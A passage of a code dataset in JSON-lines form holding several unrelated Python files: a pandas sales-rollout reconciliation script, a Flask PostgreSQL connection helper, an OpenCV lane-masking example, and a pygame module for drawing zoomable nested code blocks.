Code'].astype(str)\r\nSap3=Sap2.drop_duplicates(subset=['Code-Mat'],keep='first')\r\nMap3=Map2[['Code-Mat1']]\r\nSap3=pd.merge(Sap3,Map3,left_on='Code-Mat',right_on='Code-Mat1',how='left')\r\nSap3=Sap3.drop_duplicates(subset=['Code-Mat'],keep='first')\r\nSap4=Sap3\r\nSap4['Code-Mat1']=Sap4['Code-Mat1'].fillna(0)\r\nSap4=Sap4[Sap4['Code-Mat1']==0]\r\nSap4=Sap4.drop(columns=['Code-Mat1'])\r\nSap4=pd.merge(Sap4,Tally,left_on='Sold To Party',right_on='Distributors Code',how='left')\r\nSap4=Sap4.rename(columns={'Distributors Code':'Tally'})\r\nSap4.loc[Sap4['Tally']>0,'Tally']='Y'\r\nSap4['Tally']=Sap4['Tally'].fillna('N')\r\nSap5=Sap4.pivot_table(index=['Tally','Sold To Party','Sold To Party Name','Material','Material Desc'],values=['Billing Quantity'])\r\nRollout['Distributor SAP code verify is correct per SAP']=Rollout['Sap Distributor Name']==Rollout['Sync Distributor Name']\r\nRollout=pd.merge(Rollout,Tally,left_on='Distributor SAP Code',right_on='Distributors Code',how='left')\r\nRollout=Rollout.rename(columns={'Distributors Code':'Tally'})\r\nRollout.loc[Rollout['Tally']>0,'Tally']='Y'\r\nRollout['Tally']=Rollout['Tally'].fillna('N')\r\ndell=Sap4[['Sold To Party','Material']]\r\ndell=dell.groupby(['Sold To Party']).count()\r\ndell=dell.reset_index()\r\ndell=dell.rename(columns={'Sold To Party':'Distributor SAP Code'})\r\nRollout=pd.merge(Rollout,dell,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nRollout=Rollout.rename(columns={'Material':'Sap sale Sku code check with DMS mapped items'})\r\nRollout['Sap sale Sku code check with DMS mapped items']=Rollout['Sap sale Sku code check with DMS mapped items'].fillna('OK')\r\nRollout=Rollout.drop_duplicates(subset=['Distributor SAP Code'],keep='first')\r\nSap3=Sap3.drop(columns=['Installation Start','Installation End'])\r\nSap4=Sap4.drop(columns=['Installation Start','Installation End'])\r\n#table= pd.pivot_table(Rollout, values='Distributor SAP Code', index=['Current status'],columns=['Biz (B2B or B2C)'], aggfunc=np.counts())\r\nwrite=pd.ExcelWriter('Total_Rollout_Status.xlsx',engine='xlsxwriter')\r\nak10.to_excel(write,sheet_name='Rollout data',index=False)\r\nRollout.to_excel(write,sheet_name='Complete Only',index=False)\r\n#Sap2.to_excel(write,sheet_name='Sales data',index=False)\r\nSap3.to_excel(write,sheet_name='Sales Unique data',index=False)\r\n#Map2.to_excel(write,sheet_name='DMS data',index=False)\r\nSap4.to_excel(write,sheet_name='Pending Item code',index=False)\r\n#dell.to_excel(write,sheet_name='count')\r\nSap5.to_excel(write,sheet_name='Table')\r\n#table.to_excel(write,sheet_name='summary')\r\nwrite.save()\r\n","repo_name":"vakhileshni/bunge","sub_path":"Total_Rollout.py","file_name":"Total_Rollout.py","file_ext":"py","file_size_in_byte":9444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21496888400","text":"from dotenv import load_dotenv\nfrom os import getenv\nfrom flask import g\nimport psycopg2\n\n\nload_dotenv()\n\n\ndef init_app(app):\n app.teardown_appcontext(close_connection)\n\n\ndef get_connection():\n if 'connection' not in g:\n g.connection = psycopg2.connect(\n dbname=getenv('DB_NAME', 'app'),\n user=getenv('DB_USER', 'app'),\n password=getenv('DB_PASSWORD', 'admin123'),\n host=getenv('DB_HOST', 'db')\n )\n return g.connection\n\n\ndef close_connection():\n connection = g.pop('connection', None)\n\n if connection is not None:\n connection.close()\n","repo_name":"dariusz-dudek/flask-api","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35255143512","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2 as cv\n\nimage = cv.imread('road.png')\nimage = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n\nprint(image.shape)\nheight = image.shape[0]\nwidth = image.shape[1]\n\n#create triangle of our lane\nregion_of_interest_vertices = [\n (0, height),\n (width/2, height/2),\n (width, height)\n]\n\ndef region_of_interest(img, vertices):\n mask = np.zeros_like(img)\n channel_count = img.shape[2]\n match_mask_color = (255,) * channel_count # (255,255,255)\n cv.fillPoly(mask, vertices, match_mask_color)\n #plt.imshow(mask)\n masked_image = cv.bitwise_and(image, mask)\n return masked_image\n\ncropped_image = region_of_interest(image,\n np.array([region_of_interest_vertices], np.int32))\nplt.imshow(cropped_image)\nplt.show()","repo_name":"Thesirloc/OpenCV-learn","sub_path":"road_lane_1.py","file_name":"road_lane_1.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32470194241","text":"from math import sin, cos, tan, pi, atan2\nimport time\n\nimport pygame\nimport pygame.locals as pgl\nfrom . import keyboard\n\nbkgColour = (255, 255, 255)\nbdrColour = (224, 224, 224)\nblkColour = (192, 192, 255)\nifColour = (192, 255, 192)\npsColour = (255, 255, 192)\ndefColour = (192, 255, 255)\ntryColour = (255, 232, 192)\nescColour = (240, 192, 255)\nesrColour = (192, 0, 255)\nselColour = ( 0, 0, 224)\ninsColour = (255, 0, 255)\n\nmPtColour = (128, 128, 255)\nmSlColour = (128, 224, 255)\nmHlColour = ( 0, 255, 128)\n\ntrcColour = (255, 0, 255)\nfTxColour = ( 0, 0, 224)\nvTxColour = ( 0, 0, 0)\ntx4Colour = (240, 240, 255)\ntEsColour = (255, 240, 255) # Loop escape root text background\ncsrColour = ( 0, 0, 0)\ncmtColour = (255, 255, 192) # Comment background\nrnbColour = (192, 192, 192) # Route name background\n\nresolution = 5\nmaxSegments = 96\n\nibeam_strings = ( #sized 8x16\n \"ooo ooo \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \" o \",\n \"ooo ooo \")\n\nrepeatLag = 0.2\nrepeatRate = 0.05\n\nclass RectType(object):\n Boundary = (bdrColour, None, 1)\n Border = ((0,0,0), None, 2)\n Solid = ((0,0,0), blkColour, 1)\n Pass = ((0,0,0), psColour, 1)\n If = ((0,0,0), ifColour, 1)\n Def = ((0,0,0), defColour, 1)\n Try = ((0,0,0), tryColour, 2)\n Hole = ((0,0,0), bkgColour, 2)\n Escape = ((0,0,0), escColour, 1)\n Selected = (selColour, None, 3)\n Insert = (None, insColour, 1)\n\nclass Painter(object):\n zoomSpeed = 1.5\n panSpeed = 1.2\n\n def __init__(self, masterBlock, screen):\n self.masterBlock = masterBlock\n self.masterBlock.g_treeModified = True\n self.screenSize = screen.get_size()\n self.screen = pygame.Surface(self.screenSize)\n self.drawing = False\n\n # Default positioning.\n self.screenArea = 0.25 * self.screenSize[0] * self.screenSize[1]\n self.drawBlock = self.masterBlock # Smallest encapsulating block.\n self.drawingPlacement = RelativePlacement(scale=0.667, shape=1.618,\n pos=(self.screenSize[0]/2.,\n self.screenSize[1]/2.),\n area=1.618)\n\n self.cycle = 0\n self.updateTime = time.time()\n self.focusing = False\n\n def reset(self, masterBlock=None):\n 'resets the view'\n if masterBlock:\n self.masterBlock = masterBlock\n self.masterBlock.g_treeModified = True\n\n # Default positioning.\n self.screenArea = 0.25 * self.screenSize[0] * self.screenSize[1]\n self.drawBlock = self.masterBlock # Smallest encapsulating block.\n self.drawingPlacement = RelativePlacement(scale=0.667, shape=1.618,\n pos=(self.screenSize[0]/2.,\n self.screenSize[1]/2.),\n area=1.618)\n\n self.focusing = False\n\n def drawChild(self, block, absPlacement):\n '''internal.\n area is (xy)_child\n shape is x_child / y_child\n\n absPlacement will become the block's g_absPlacement.\n '''\n block.g_cycle = self.cycle\n block.g_absPlacement = absPlacement\n\n # Check if this block encapsulates the screen.\n if self.checkDrawBlockCandidate(block):\n # Block is completely off the screen. Don't draw.\n return\n\n # Draw the border.\n block.g_border.draw(self.screen)\n\n # Check for size cutoff.\n if block.g_sizeCutoff != None and \\\n absPlacement.scale < block.g_sizeCutoff:\n for f in block.g_cutoffFeatures:\n f.draw(self.screen)\n else:\n # Draw the features.\n for f in block.g_features:\n f.draw(self.screen)\n\n # Draw the children.\n for ch in block.g_children:\n # Set new settings.\n newPlacement = absPlacement.add(ch.g_relPlacement,\n self.screenArea)\n\n self.drawChild(ch, newPlacement)\n\n # Draw the connections.\n for f in block.g_connections:\n f.draw(self.screen)\n for f in block.g_interactiveFeatures:\n f.draw(self.screen)\n\n def addFeature(self, feature):\n '''internal.\n Adds the specified interactive feature to the block's layout.'''\n # Add it.\n self.nodeStack[-1][2].append(feature)\n # Draw it.\n feature.draw(self)\n\n def lineIntersectsScreenEdge(self, p1, p2):\n '''internal.\n Tests whether the specified line segment intersects any of the edges\n of the screen.'''\n X, Y = self.screenSize\n\n # 1. Test for both off the same side.\n if (p1[0] < 0 and p2[0] < 0) or (p1[1] < 0 and p2[1] < 0):\n return False\n if (p1[0] > X and p2[0] > X) or (p1[1] > Y and p2[1] > Y):\n return False\n\n # 2. Test for intersecting top or bottom.\n if p1[1] != p2[1]:\n c = p2[0] - p2[1]*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c > 0 and c < X:\n return True\n c = p2[0] - (p2[1]-Y)*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c > 0 and c < X:\n return True\n\n # 3. Test for intersecting left or right.\n if p1[0] != p2[0]:\n c = p2[1] - p2[0]*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c > 0 and c < Y:\n return True\n c = p2[1] - (p2[0]-X)*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c > 0 and c < Y:\n return True\n\n return False\n\n def getLineScreenFlags(self, p1, p2):\n '''internal.\n Tests whether the specified line segment intersects any of the edges\n of the screen, and returns a set of flags indicating which sides of\n the screen they cross.'''\n X, Y = self.screenSize\n\n # 1. Test for both off the same side.\n if (p1[0] < 0 and p2[0] < 0):\n if (p1[1] > 0 and p1[1] < Y) or (p2[1] > 0 and p2[1] < Y):\n return set('L') # Crosses left side.\n if (p1[1] < 0 and p2[1] > Y) or (p2[1] < 0 and p1[1] > Y):\n return set('L')\n return set()\n if (p1[1] < 0 and p2[1] < 0):\n if (p1[0] > 0 and p1[0] < X) or (p2[0] > 0 and p2[0] < X):\n return set('T') # Crosses top.\n if (p1[0] < 0 and p2[0] > X) or (p2[0] < 0 and p1[0] > X):\n return set('T')\n return set()\n if (p1[0] > X and p2[0] > X):\n if (p1[1] > 0 and p1[1] < Y) or (p2[1] > 0 and p2[1] < Y):\n return set('R') # Crosses right side.\n if (p1[1] < 0 and p2[1] > Y) or (p2[1] < 0 and p1[1] > Y):\n return set('R')\n return set()\n if (p1[1] > Y and p2[1] > Y):\n if (p1[0] > 0 and p1[0] < X) or (p2[0] > 0 and p2[0] < X):\n return set('B') # Crosses bottom.\n if (p1[0] < 0 and p2[0] > X) or (p2[0] < 0 and p1[0] > X):\n return set('B')\n return set()\n\n # 2. Test for intersecting top or bottom.\n result = set()\n if p1[1] != p2[1]:\n c1 = p2[0] - p2[1]*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c1 > 0 and c1 < X:\n return None\n c2 = p2[0] - (p2[1]-Y)*(p2[0]-p1[0]+0.)/(p2[1]-p1[1])\n if c2 > 0 and c2 < X:\n return None\n if c1 < 0 and c2 < 0:\n result.add('L')\n elif c1 > X and c2 > X:\n result.add('R')\n else:\n return None\n\n # 3. Test for intersecting left or right.\n if p1[0] != p2[0]:\n c1 = p2[1] - p2[0]*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c1 > 0 and c1 < Y:\n return None\n c2 = p2[1] - (p2[0]-X)*(p2[1]-p1[1]+0.)/(p2[0]-p1[0])\n if c2 > 0 and c2 < Y:\n return None\n if c1 < 0 and c2 < 0:\n result.add('T')\n elif c1 > Y and c2 > Y:\n result.add('B')\n else:\n return None\n\n return result\n\n def checkDrawBlock(self):\n '''internal.\n Checks whether the current drawBlock does actually encapsulate the\n screen area, and fixes it if not.'''\n W, H = self.screenSize\n\n # We can't possibly look further out than the master block.\n if self.drawBlock == self.masterBlock:\n return\n\n shape = self.drawingPlacement.shape\n area = self.drawingPlacement.area\n width = (shape * area) ** 0.5\n height = (area / shape) ** 0.5\n pts = []\n for p in ((-width,height),(-width,-height),(width,-height),(width,height)):\n q = self.drawingPlacement.parentPoint(p, self.screenArea)\n pts.append(q)\n # Check if the point lies within the screen area.\n if q[0]>0 and q[0]0 and q[1]0 and q[0]0 and q[1] 1 and \\\n self.focusTargets[-2].g_cycle == self.cycle:\n self.focusTargets.pop()\n\n # Now pan and zoom the block towards the centre of the screen.\n pt = self.focusTargets[-1].g_absPlacement.pos\n finished = 0\n\n # Pan towards the screen centre.\n scC = [0.5*i for i in self.screenSize]\n dist = dTime * self.panSpeed * (self.screenArea ** 0.5)\n dPos = tuple(scC[i] - pt[i] for i in (0,1))\n targetDist = (dPos[0]**2 + dPos[1]**2) ** 0.5\n if dist < targetDist:\n # Doesn't reach the exact centre.\n ratio = dist / targetDist\n dPos = tuple(i * ratio for i in dPos)\n else:\n finished = 1\n self.pan(dPos)\n pt = tuple(pt[i] + dPos[i] for i in (0,1))\n\n # 2. Zoom component.\n sc = self.focusTargets[-1].g_absPlacement.scale\n relAmount = dTime * self.zoomSpeed\n if sc < 0.7:\n # Going in.\n relScale = 8 ** relAmount\n if sc * relScale >= 0.7:\n relScale = 0.7 / sc\n finished = finished + 1\n else:\n # Going out.\n relScale = 8 ** -relAmount\n if sc * relScale <= 0.7:\n relScale = 0.7 / sc\n finished = finished + 1\n pt = scC # tuple(scC[i]-pt[i] for i in (0,1))\n self.zoom(relScale, pt)\n\n # Check if we're there yet.\n if finished >= 2 and len(self.focusTargets) == 1:\n self.focusing = False\n\n\n def draw(self):\n '''Draws the current view to the screen.'''\n\n if self.drawing:\n return\n\n self.maybeNav()\n\n # Check if it's been modified.\n if not self.masterBlock.g_treeModified:\n return\n\n self.drawing = True\n\n # Check if we need to reset the view.\n if self.drawBlock.master != self.masterBlock:\n self.reset()\n\n\n # Fill the background.\n self.screen.fill(bkgColour)\n\n # Make sure that everything's correctly laid out.\n self.drawBlock.g_nonDrawn = False\n self.drawBlock.g_draw()\n\n # Draw the block.\n self.cycle = (self.cycle + 1) % 2147000000\n self.drawChild(self.drawBlock, self.drawingPlacement)\n\n self.masterBlock.g_treeModified = False\n self.drawing = False\n\n def pan(self, amount):\n '''Pans the view by the specified amount.'''\n if self.drawing:\n return\n\n self.masterBlock.g_treeModified = True\n self.drawingPlacement.pos = [self.drawingPlacement.pos[i] + \\\n amount[i] for i in (0,1)]\n self.checkDrawBlock()\n\n def zoom(self, relScale, centre=None):\n '''Zooms the view by the specified amount.'''\n if self.drawing:\n return\n\n self.drawingPlacement.scale = self.drawingPlacement.scale * relScale\n\n # Keep the screen centre fixed.\n if centre == None:\n centre = [0.5*i for i in self.screenSize]\n\n self.drawingPlacement.pos = [centre[i]+(self.drawingPlacement.pos[i]- \\\n centre[i])*(relScale ** 0.5) for i in (0,1)]\n\n self.checkDrawBlock()\n self.masterBlock.g_treeModified = True\n\n def navigate(self, point, amount):\n '''(point, amount) - Navigates the view as if the user had clicked on\n point and dragged the mouse by amount. Returns the new position of the\n point where the user clicked. Horizontal motion moves the point along\n the line joining the point to the centre of the screen. Vertical motion\n zooms towards or away from the point.'''\n\n if self.drawing:\n return\n\n # 1. Pan component.\n scC = [0.5*i for i in self.screenSize]\n if abs(point[1] - scC[1]) < 3 * abs(point[0] - scC[0]):\n dPos = (amount[0], amount[0] * (point[1] - scC[1]) / \\\n (point[0] - scC[0]))\n self.pan(dPos)\n point = tuple(point[i] + dPos[i] for i in (0,1))\n\n # 2. Zoom component.\n self.masterBlock.g_treeModified = True\n relAmount = amount[1] / (self.screenArea ** 0.5)\n relScale = 8 ** relAmount\n self.zoom(relScale, point)\n\n return point\n\n def focusView(self, block):\n '''(block) - starts the view moving towards the specified block.\n If the view is already moving, the view will jump instantly to the\n specified block.'''\n\n # If we're already moving, jump to the block.\n if self.focusing:\n scC = [0.5*i for i in self.screenSize]\n\n # Make sure that every intermediate block's been drawn right.\n b = block\n trail = []\n while b.g_cycle != self.cycle:\n trail.insert(0, b)\n b = b.parent\n if b.g_nonDrawn:\n b = b.parent\n for b2 in trail:\n b2.g_absPlacement = b.g_absPlacement.add(b2.g_relPlacement,\n self.screenArea)\n b = b2\n angle = block.g_absPlacement.angle\n\n # Jump to it.\n self.drawBlock = block\n self.drawingPlacement = RelativePlacement(scC, 0.7, \\\n block.g_relPlacement.shape, block.g_relPlacement.area, \\\n angle)\n self.masterBlock.g_treeModified = True\n\n self.focusing = False\n else:\n self.focusing = 2 # Indicates that we're zooming out.\n\n ft = []\n while True:\n if not block.g_nonDrawn:\n ft.append(block)\n if block == self.masterBlock:\n break\n block = block.parent\n self.focusTargets = ft\n\n def setFocusParent(self, block):\n '''internal.'''\n fp = []\n while True:\n fp.append(block)\n if block == self.masterBlock:\n break\n block = block.parent\n self.focusParents = fp\n\nclass RelativePlacement(object):\n __slots__ = ['pos', 'scale', 'shape', 'area', 'angle']\n # Area parameter controls internal scaling.\n def __init__(self, pos=(0.,0.), scale=1., shape=1.618, area=1., angle=0.):\n self.pos = pos\n self.scale = scale\n self.shape = shape\n self.area = area\n self.angle = angle\n\n def scaleToWidth(self):\n '''internal.\n Scales the drawer object so that the allowed drawing area is from\n (-1, -y) to (1, y) and returns y.'''\n\n self.area = 1. / self.shape\n return self.area\n\n def scaleToHeight(self):\n '''internal.\n Scales the drawer object so that the allowed drawing area is from\n (-x, -1) to (x, 1) and returns x.'''\n\n self.area = self.shape\n return self.area\n\n def scaleDesired(self, desiredShape):\n '''internal.\n Scales so that everything in (-desiredShape, -1.) to (desiredShape, 1.)\n is in the view.'''\n\n self.area = max(desiredShape**2 / self.shape, self.shape)\n\n def parentPoint(self, point, parentArea):\n '''Translates a point from this placement to a parent placement.'''\n u, v = point\n\n # Translate to offset from the parent's origin.\n m = (self.scale * parentArea / self.area) ** 0.5\n theta = self.angle\n U = self.pos[0] + m*(u*cos(theta) - v*sin(theta))\n V = self.pos[1] + m*(u*sin(theta) + v*cos(theta))\n\n return U, V\n\n def parentLength(self, x, parentArea):\n '''Tranlates a length from this placement to parent placement.'''\n m = (self.scale * parentArea / self.area) ** 0.5\n return m * x\n\n def parentDisplacement(self, s, parentArea):\n '''Tranlates a length from this placement to parent placement.'''\n u, v = s\n\n m = (self.scale * parentArea / self.area) ** 0.5\n theta = self.angle\n U = m*(u*cos(theta) - v*sin(theta))\n V = m*(+u*sin(theta) + v*cos(theta))\n return U, V\n\n def parentAngle(self, theta):\n '''Translates an angle from this placement to parent placement.'''\n return theta + self.angle\n\n def pointFromParent(self, point, parentArea):\n '''Translates a point from the parent placement to this one.'''\n\n # Translate to offset from this origin.\n X, Y = (point[i] - self.pos[i] for i in (0, 1))\n\n # Translate into local co-ordinates.\n m = (self.area / self.scale / parentArea) ** 0.5\n theta = self.angle\n u = m*(X*cos(theta) + Y*sin(theta))\n v = m*(-X*sin(theta) + Y*cos(theta))\n\n return u, v\n\n def add(self, other, parentArea):\n '''Combines the the two placements.'''\n angle = self.angle + other.angle\n area = other.area\n shape = other.shape\n scale = self.scale * other.scale\n pos = self.parentPoint(other.pos, parentArea)\n\n return RelativePlacement(pos=pos, scale=scale, shape=shape, area=area,\n angle=angle)\n\nclass Feature(object):\n '''Defines a feature of a block.'''\n interactive = False\n def draw(self, painter):\n '''Draws the feature.'''\n raise NotImplementedError\n\nclass InteractiveFeature(Feature):\n '''Defines an interactive feature of a block.'''\n interactive = True\n def checkMouseHover(self, point):\n '''Checks if the mouse is over this item and returns True or False\n accordingly.'''\n raise NotImplementedError\n\n def mouseHover(self, screen):\n '''Called when the mouse is over this item.'''\n raise NotImplementedError\n\n def mouseClick(self, actor):\n '''Performs the relevant action when the mouse is clicked over this\n item.'''\n raise NotImplementedError\n\nclass Rectangle(Feature):\n __slots__ = ['block', 'halfWidth', 'halfHeight', 'type', 'pt']\n def __init__(self, block, halfWidth, halfHeight, type=RectType.Boundary, \\\n pt=(0.,0.)):\n self.block = block\n self.halfWidth = halfWidth\n self.halfHeight = halfHeight\n self.type = type\n self.pt = pt\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n halfWidth, halfHeight = self.halfWidth, self.halfHeight\n x0,y0 = self.pt\n x1,y1 = pl.parentPoint((x0-halfWidth, y0-halfHeight), scArea)\n x2,y2 = pl.parentPoint((x0+halfWidth, y0-halfHeight), scArea)\n x3,y3 = pl.parentPoint((x0+halfWidth, y0+halfHeight), scArea)\n x4,y4 = pl.parentPoint((x0-halfWidth, y0+halfHeight), scArea)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n borderColour, fillColour, thickness = self.type\n\n if fillColour:\n pygame.draw.polygon(screen, fillColour, polygon)\n if borderColour:\n pygame.draw.polygon(screen, borderColour, polygon, thickness)\n\nclass Diamond(Feature):\n '''Draws a square diamond with semi-axis of size.'''\n __slots__ = ['block', 'pos', 'size']\n def __init__(self, block, pos, size):\n self.block = block\n self.pos = pos\n self.size = size\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n pos, size = self.pos, self.size\n x1,y1 = pl.parentPoint((pos[0], pos[1]-size), scArea)\n x2,y2 = pl.parentPoint((pos[0]+size, pos[1]), scArea)\n x3,y3 = pl.parentPoint((pos[0], pos[1]+size), scArea)\n x4,y4 = pl.parentPoint((pos[0]-size, pos[1]), scArea)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n pygame.draw.polygon(screen, ifColour, polygon)\n pygame.draw.polygon(screen, (0,0,0), polygon, 1)\n\nclass Connection(Feature):\n '''Connects the two points.'''\n __slots__ = ['block', 'pos1', 'pos2', 'theta1', 'theta2', 'colour']\n def __init__(self, block, pos1, pos2, theta1=0., theta2=0., colour=(0,0,0)):\n self.block = block\n self.pos1 = pos1\n self.pos2 = pos2\n self.theta1 = theta1\n self.theta2 = theta2\n self.colour = colour\n\n def drawArc(self, pts, centre, radius, theta1, gamma, thickness):\n '''internal.\n Draws an arc with the given screen coordinates.'''\n hTh = min(thickness/2., abs(radius))\n\n # Calculate the arc length and how many pieces to chop it into.\n arcLen = abs(radius * gamma)\n n = min(int(arcLen / resolution) + 1, maxSegments)\n dGamma = gamma / n\n\n # Calculate a list of points.\n if radius * gamma > 0:\n r1 = radius + hTh\n r2 = radius - hTh\n else:\n r1 = radius - hTh\n r2 = radius + hTh\n\n theta = theta1\n for i in range(n+1):\n cosTheta = cos(theta)\n sinTheta = sin(theta)\n pts.append( (centre[0] + r1*cosTheta, centre[1] + r1*sinTheta))\n pts.insert(0, (centre[0] + r2*cosTheta, centre[1] + r2*sinTheta))\n theta = theta + dGamma\n\n def draw(self, screen):\n '''Draws a smooth connecting line between the two points.'''\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n pos1, pos2, theta1, theta2 = self.pos1, self.pos2, self.theta1, \\\n self.theta2\n\n # Transform to screen coordinates.\n pos1 = pl.parentPoint(pos1, scArea)\n pos2 = pl.parentPoint(pos2, scArea)\n theta1 = pl.parentAngle(theta1)\n theta2 = pl.parentAngle(theta2)\n\n p1off = p2off = False\n # If both points are off the screen, don't draw.\n if not (pos1[0] > 0 < pos1[1] and pos1[0] < scsz[0] and \\\n pos1[1] < scsz[1]):\n p1off = True\n if not (pos2[0] > 0 < pos2[1] and pos2[0] < scsz[0] and \\\n pos2[1] < scsz[1]):\n p2off = True\n if p1off and p2off:\n return\n\n # Calculate line width.\n lw = min(3, int(4 * self.block.g_absPlacement.scale + 1))\n\n # Calculate projection length based on separation.\n pLen = 0.5 * ((pos1[0]-pos2[0])**2+(pos1[1]-pos2[1])**2)**0.5\n\n wholeAngle = atan2(pos2[1]-pos1[1],pos2[0]-pos1[0])\n w1 = cos(theta1 - wholeAngle) ** 2 + 0.1\n w2 = cos(theta2 + pi - wholeAngle) ** 2 + 0.1\n W = w1 + w2\n pLen1 = pLen * w1 / W\n pLen2 = pLen * w2 / W\n\n # Project to find target points.\n pos1a = [pos1[0] + pLen1 * cos(theta1),\n pos1[1] + pLen1 * sin(theta1)]\n pos2a = [pos2[0] - pLen2 * cos(theta2),\n pos2[1] - pLen2 * sin(theta2)]\n\n # Find angle of second target point from first.\n alpha = atan2(pos2a[1]-pos1a[1],pos2a[0]-pos1a[0]) % (2*pi)\n\n # Projected along line between target points.\n pos1b = [pos1a[0] + pLen1 * cos(alpha),\n pos1a[1] + pLen1 * sin(alpha)]\n pos2b = [pos2a[0] - pLen2 * cos(alpha),\n pos2a[1] - pLen2 * sin(alpha)]\n\n # Find the angles between points at target points.\n phi1 = (theta1 - alpha) % (2*pi) - pi\n phi2 = (alpha - theta2) % (2*pi) - pi\n\n points = []\n # Firt curve - check for off-screen.\n if p1off and not (pos1b[0] > 0 < pos1b[1] and pos1b[0] < scsz[0] and \\\n pos1b[1] < scsz[1]):\n # Off-screen - add the mid-point.\n points.append((pos1b[0] + 0.5*lw*sin(theta1), \\\n pos1b[1] - 0.5*lw*cos(theta1)))\n points.insert(0, (pos1b[0] - 0.5*lw*sin(theta1), \\\n pos1b[1] + 0.5*lw*cos(theta1)))\n # Now check for straight.\n elif abs(phi1 % (2.*pi) - pi) < 0.1:\n # Straight - add the end-point.\n points.append((pos1[0] + 0.5*lw*sin(theta1), \\\n pos1[1] - 0.5*lw*cos(theta1)))\n points.insert(0, (pos1[0] - 0.5*lw*sin(theta1), \\\n pos1[1] + 0.5*lw*cos(theta1)))\n elif abs((phi1+pi) % (.2*pi) - pi) < 0.1:\n # Reverse - add the end-point upside down.\n points.append((pos1[0] - 0.5*lw*sin(theta1), \\\n pos1[1] + 0.5*lw*cos(theta1)))\n points.insert(0, (pos1[0] + 0.5*lw*sin(theta1), \\\n pos1[1] - 0.5*lw*cos(theta1)))\n else:\n # Calculate radius of curvature.\n r1 = pLen1 * tan(phi1 / 2.)\n\n # Calculate centre of curvature.\n c1 = [pos1[0] + r1 * cos(theta1 + pi/2.),\n pos1[1] + r1 * sin(theta1 + pi/2.)]\n\n # Draw the curve.\n self.drawArc(points, c1, r1, theta1-pi/2., pi-phi1%(2*pi), lw)\n\n # Second curve - check for off-screen.\n if p2off and not (pos2b[0] > 0 < pos2b[1] and pos2b[0] < scsz[0] and \\\n pos2b[1] < scsz[1]):\n # Off-screen - add the mid-point.\n points.append((pos2b[0] + 0.5*lw*sin(theta2), \\\n pos2b[1] - 0.5*lw*cos(theta2)))\n points.insert(0, (pos2b[0] - 0.5*lw*sin(theta2), \\\n pos2b[1] + 0.5*lw*cos(theta2)))\n # Now check for straight.\n elif abs(phi2%(2.*pi) - pi) < 0.1:\n # Straight - add the end-point.\n points.append((pos2[0] + 0.5*lw*sin(theta2), \\\n pos2[1] - 0.5*lw*cos(theta2)))\n points.insert(0, (pos2[0] - 0.5*lw*sin(theta2), \\\n pos2[1] + 0.5*lw*cos(theta2)))\n elif abs((phi2+pi) % (2.*pi) - pi) < 0.1:\n # Reverse - add the end-point upside down.\n points.append((pos2[0] - 0.5*lw*sin(theta2), \\\n pos2[1] + 0.5*lw*cos(theta2)))\n points.insert(0, (pos2[0] + 0.5*lw*sin(theta2), \\\n pos2[1] - 0.5*lw*cos(theta2)))\n else:\n # Calculate radius of curvature.\n r2 = -pLen2 * tan(phi2 / 2.)\n\n # Calculate centre of curvature.\n c2 = [pos2[0] + r2 * cos(theta2 - pi/2.),\n pos2[1] + r2 * sin(theta2 - pi/2.)]\n\n # Draw the curve.\n self.drawArc(points, c2, r2, theta2+phi2-pi/2., pi-phi2%(2*pi), lw)\n\n # Do the actual drawing.\n pygame.draw.polygon(screen, self.colour, points)\n\nclass EscapeRoute(Connection):\n def __init__(self, block, pos1, pos2, theta1, theta2 = -0.25*pi):\n '''Joins the two points as an escape route ONLY if both points are on\n the screen.'''\n super(EscapeRoute, self).__init__(block, pos1, pos2, theta1, \\\n theta2=theta2, colour=esrColour)\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n sp1 = pl.parentPoint(self.pos1, scArea)\n sp2 = pl.parentPoint(self.pos2, scArea)\n if not (sp1[0] > 0 < sp2[0] and sp1[0] < scsz[0] > sp2[0] \\\n and sp1[1] > 0 < sp2[1] and sp1[1] < scsz[1] > sp2[1]):\n return\n\n super(EscapeRoute, self).draw(screen)\n\nclass Text(Feature):\n __slots__ = ['block', 'text', 'pt', 'font', 'radius', 'bkgColour']\n def __init__(self, block, text, radius, pt=(0,0), bkgColour=None, \\\n font=None):\n '''Draws the specified text at the specified position.'''\n self.block = block\n self.text = text\n self.radius = radius\n self.pt = pt\n self.bkgColour = bkgColour\n\n if font == None:\n try:\n self.font = Text.defaultFont\n except:\n self.font = Text.defaultFont = pygame.font.Font(None, 24)\n else:\n self.font = font\n\n def draw(self, screen):\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n # 1. Render the text.\n if self.bkgColour:\n surface = self.font.render(self.text, True, (0,0,0), \\\n self.bkgColour).convert()\n else:\n surface = self.font.render(self.text, False, (0,0,0)).convert()\n sz = surface.get_size()\n\n # Don't draw it if it's too small.\n if 2. * sz[0] * 